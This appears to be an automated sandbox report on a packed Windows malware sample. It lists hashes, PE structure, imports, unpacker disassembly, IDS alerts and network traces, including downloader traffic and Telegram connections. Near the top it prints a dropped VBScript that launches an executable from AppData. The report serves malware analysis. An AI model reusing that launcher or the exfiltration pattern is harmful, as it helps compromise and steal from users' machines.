                                                                                                                SHA-256:D573ADF05AC57C88278EB3C79A5994BCF578DCD61D901C3089E6763ED42A2AC6
                                                                                                                SHA-512:7CC5B032CDF08A90DCBC5B6A5AD4C1DFC73F021825B86A4599AA1A82333F3D2A7E7BA5DCB8D1EBD672DFDD32BE4AB97BF79FD3F7B10CDDF99143BC90AD859CBB
                                                                                                                Malicious:true
                                                                                                                Reputation:low
                                                                                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.i.n.h.u.m.a.t.e.\.d.e.m.o.n.e.t.i.s.e.d...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Entropy (8bit):7.943126339759557
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: B7N48hmO78.exe
File size: 649'216 bytes
MD5: 80a64f0b8df55d637e135f0eb4fb6b70
SHA1: f491fc184d0f15d789e81577e47446478c10ed53
SHA256: 3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8
SHA512: f2604fc98d1ed6959b4a42ef442cac15919ebb1b26f7516fa0ca782c639d035c7f5c0f599511e87246338a959be4e5104ff98e3df4bb7ab78b50389784e83432
SSDEEP: 12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiaqooGCQemOT6I0FGk9x:Zq5TfcdHj4fmbGG53OF0Nx
TLSH: 2CD423A0E9C8CC72EA413732817ECF905565B932ED466B1A5BD4E34E7473243A483F6E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x522f90
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67471042 [Wed Nov 27 12:27:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: ef471c0edf1877cd5a881a6a8bf647b9
Instruction
pushad
mov esi, 004CF000h
lea edi, dword ptr [esi-000CE000h]
push edi
jmp 00007F4E312BFC1Dh
nop
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4E312BFBFFh
mov eax, 00000001h
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
add ebx, ebx
jnc 00007F4E312BFC1Dh
jne 00007F4E312BFC3Ah
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4E312BFC31h
dec eax
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc eax, eax
jmp 00007F4E312BFBE6h
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
jmp 00007F4E312BFC64h
xor ecx, ecx
sub eax, 03h
jc 00007F4E312BFC23h
shl eax, 08h
mov al, byte ptr [esi]
inc esi
xor eax, FFFFFFFFh
je 00007F4E312BFC87h
sar eax, 1
mov ebp, eax
jmp 00007F4E312BFC1Dh
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4E312BFBDEh
inc ecx
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jc 00007F4E312BFBD0h
add ebx, ebx
jne 00007F4E312BFC19h
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
adc ecx, ecx
add ebx, ebx
jnc 00007F4E312BFC01h
jne 00007F4E312BFC1Bh
mov ebx, dword ptr [esi]
sub esi, FFFFFFFCh
adc ebx, ebx
jnc 00007F4E312BFBF6h
add ecx, 02h
cmp ebp, FFFFFB00h
adc ecx, 02h
lea edx, dword ptr [edi+ebp]
cmp ebp, FFFFFFFCh
jbe 00007F4E312BFC20h
mov al, byte ptr [edx]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x16ddbc | 0x424 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x124000 | 0x49dbc | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16e1e0 | 0x18 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x123174 | 0x48 | UPX1 |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| UPX0 | 0x1000 | 0xce000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| UPX1 | 0xcf000 | 0x55000 | 0x54200 | 7611cb89c40f2c739b956cb6edf01804 | False | 0.9888500650074294 | data | 7.937075263024194 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x124000 | 0x4b000 | 0x4a200 | 15d57d0eb0f4ac6de1a033e757b0bf89 | False | 0.9318382430438449 | data | 7.906003791272813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x1245ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0x1246d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0x124804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0x124930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333 |
| RT_ICON | 0x124c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5 |
| RT_ICON | 0x124d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388 |
| RT_ICON | 0x125bf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524 |
| RT_ICON | 0x1264a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918 |
| RT_ICON | 0x126a0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727 |
| RT_ICON | 0x128fb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496 |
| RT_ICON | 0x12a064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227 |
| RT_MENU | 0xca4a0 | 0x50 | empty | English | Great Britain | 0 |
| RT_STRING | 0xca4f0 | 0x594 | empty | English | Great Britain | 0 |
| RT_STRING | 0xcaa84 | 0x68a | empty | English | Great Britain | 0 |
| RT_STRING | 0xcb110 | 0x490 | empty | English | Great Britain | 0 |
| RT_STRING | 0xcb5a0 | 0x5fc | empty | English | Great Britain | 0 |
| RT_STRING | 0xcbb9c | 0x65c | empty | English | Great Britain | 0 |
| RT_STRING | 0xcc1f8 | 0x466 | empty | English | Great Britain | 0 |
| RT_STRING | 0xcc660 | 0x158 | empty | English | Great Britain | 0 |
| RT_RCDATA | 0x12a4d0 | 0x43391 | data | | | 1.0003304944705733 |
| RT_GROUP_ICON | 0x16d868 | 0x76 | data | English | Great Britain | 0.6610169491525424 |
| RT_GROUP_ICON | 0x16d8e4 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x16d8fc | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x16d914 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x16d92c | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x16da0c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814 |
| DLL | Import |
|---|---|
| KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess |
| ADVAPI32.dll | AddAce |
| COMCTL32.dll | ImageList_Remove |
| COMDLG32.dll | GetSaveFileNameW |
| GDI32.dll | LineTo |
| IPHLPAPI.DLL | IcmpSendEcho |
| MPR.dll | WNetUseConnectionW |
| ole32.dll | CoGetObject |
| OLEAUT32.dll | VariantInit |
| PSAPI.DLL | GetProcessMemoryInfo |
| SHELL32.dll | DragFinish |
| USER32.dll | GetDC |
| USERENV.dll | LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
| VERSION.dll | VerQueryValueW |
| WININET.dll | FtpOpenFileW |
| WINMM.dll | timeGetTime |
| WSOCK32.dll | socket |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-10T15:33:42.225455+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 132.226.247.73 | 80 | TCP |
| 2025-01-10T15:33:43.772377+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 132.226.247.73 | 80 | TCP |
| 2025-01-10T15:33:44.402670+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49706 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:33:45.147400+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49707 | 132.226.247.73 | 80 | TCP |
| 2025-01-10T15:33:47.086336+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49710 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:33:48.381258+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49712 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:33:51.020949+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49716 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:33:52.334346+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49718 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:33:53.819335+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49720 | 132.226.247.73 | 80 | TCP |
| 2025-01-10T15:33:54.590569+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49722 | 149.154.167.220 | 443 | TCP |
| 2025-01-10T15:33:55.694292+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49720 | 132.226.247.73 | 80 | TCP |
| 2025-01-10T15:33:56.258742+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49732 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:33:57.024547+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49739 | 132.226.247.73 | 80 | TCP |
| 2025-01-10T15:33:57.606888+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49744 | 104.21.32.1 | 443 | TCP |
| 2025-01-10T15:34:06.345035+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49812 | 149.154.167.220 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Jan 10, 2025 15:33:43.343502998 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.391086102 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.431329966 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.501516104 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.501594067 CET44349705104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.501758099 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.508687973 CET49705443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.514060020 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:43.518948078 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.724380970 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.772377014 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:43.784329891 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.784360886 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:43.784429073 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.788748026 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:43.788765907 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.240334988 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.243097067 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:44.243128061 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.402683020 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.402743101 CET44349706104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.402797937 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:44.403182030 CET49706443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:44.411228895 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.412297010 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.416172028 CET8049704132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.416241884 CET4970480192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.417083979 CET8049707132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:44.417154074 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.419333935 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:44.424108982 CET8049707132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.107078075 CET8049707132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.108534098 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.108582020 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.108997107 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.108997107 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.109026909 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.147399902 CET4970780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:45.573561907 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.575501919 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.575584888 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.741277933 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.741343021 CET44349708104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.741409063 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.741844893 CET49708443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:45.750169039 CET4970980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:45.756073952 CET8049709132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:45.756162882 CET4970980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:45.756248951 CET4970980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:45.761008978 CET8049709132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:46.461771965 CET8049709132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:46.469664097 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:46.469767094 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:46.469868898 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:46.473109961 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:46.473145008 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:46.506751060 CET4970980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:46.940382957 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:46.942164898 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:46.942251921 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.086353064 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.086424112 CET44349710104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.086473942 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:47.086987019 CET49710443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:47.090457916 CET4970980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:47.091430902 CET4971180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:47.095395088 CET8049709132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.095465899 CET4970980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:47.096210957 CET8049711132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.096287012 CET4971180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:47.096369028 CET4971180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:47.101115942 CET8049711132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.776971102 CET8049711132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.778927088 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:47.778984070 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.779130936 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:47.779329062 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:47.779339075 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:47.819421053 CET4971180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:48.241061926 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:48.242995977 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:48.243016005 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:48.381226063 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:48.381294966 CET44349712104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:48.381436110 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:48.382076979 CET49712443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:48.387456894 CET4971180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:48.388381958 CET4971380192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:48.392456055 CET8049711132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:48.392549992 CET4971180192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:48.393182039 CET8049713132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:48.393260956 CET4971380192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:48.393336058 CET4971380192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:48.398127079 CET8049713132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.095928907 CET8049713132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.106589079 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:49.106635094 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.106724977 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:49.106951952 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:49.106959105 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.147422075 CET4971380192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:49.569104910 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.571413040 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:49.571441889 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.718981981 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.719049931 CET44349714104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.719101906 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:49.719588041 CET49714443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:49.723066092 CET4971380192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:49.724493980 CET4971580192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:49.728089094 CET8049713132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.728147030 CET4971380192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:49.729373932 CET8049715132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:49.729439020 CET4971580192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:49.729612112 CET4971580192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:49.734386921 CET8049715132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:50.414072990 CET8049715132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:50.416596889 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:50.416652918 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:50.416713953 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:50.416904926 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:50.416919947 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:50.459884882 CET4971580192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:50.871629953 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:50.884006023 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:50.884046078 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.020885944 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.020956993 CET44349716104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.021034956 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:51.021505117 CET49716443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:51.025553942 CET4971580192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:51.026195049 CET4971780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:51.030750990 CET8049715132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.031018972 CET8049717132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.031083107 CET4971580192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:51.031107903 CET4971780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:51.031208038 CET4971780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:51.035970926 CET8049717132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.713777065 CET8049717132.226.247.73192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.724337101 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:51.724436998 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.724543095 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:51.728260040 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:51.728297949 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:51.756791115 CET4971780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:52.183947086 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:52.185668945 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:52.185705900 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:52.334376097 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:52.334455967 CET44349718104.21.32.1192.168.2.5
                                                                                                                Jan 10, 2025 15:33:52.334517002 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:52.335088015 CET49718443192.168.2.5104.21.32.1
                                                                                                                Jan 10, 2025 15:33:52.338020086 CET4971780192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:52.338970900 CET4971980192.168.2.5132.226.247.73
                                                                                                                Jan 10, 2025 15:33:52.343105078 CET8049717132.226.247.73192.168.2.5
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 10, 2025 15:33:52.343198061 CET  49717        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:52.343910933 CET  80           49719      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:52.343992949 CET  49719        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:52.344095945 CET  49719        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:52.348928928 CET  80           49719      132.226.247.73   192.168.2.5
Jan 10, 2025 15:33:52.866496086 CET  49720        80         192.168.2.5      132.226.247.73
Jan 10, 2025 15:33:52.871733904 CET  80           49720      132.226.247.73   192.168.2.5
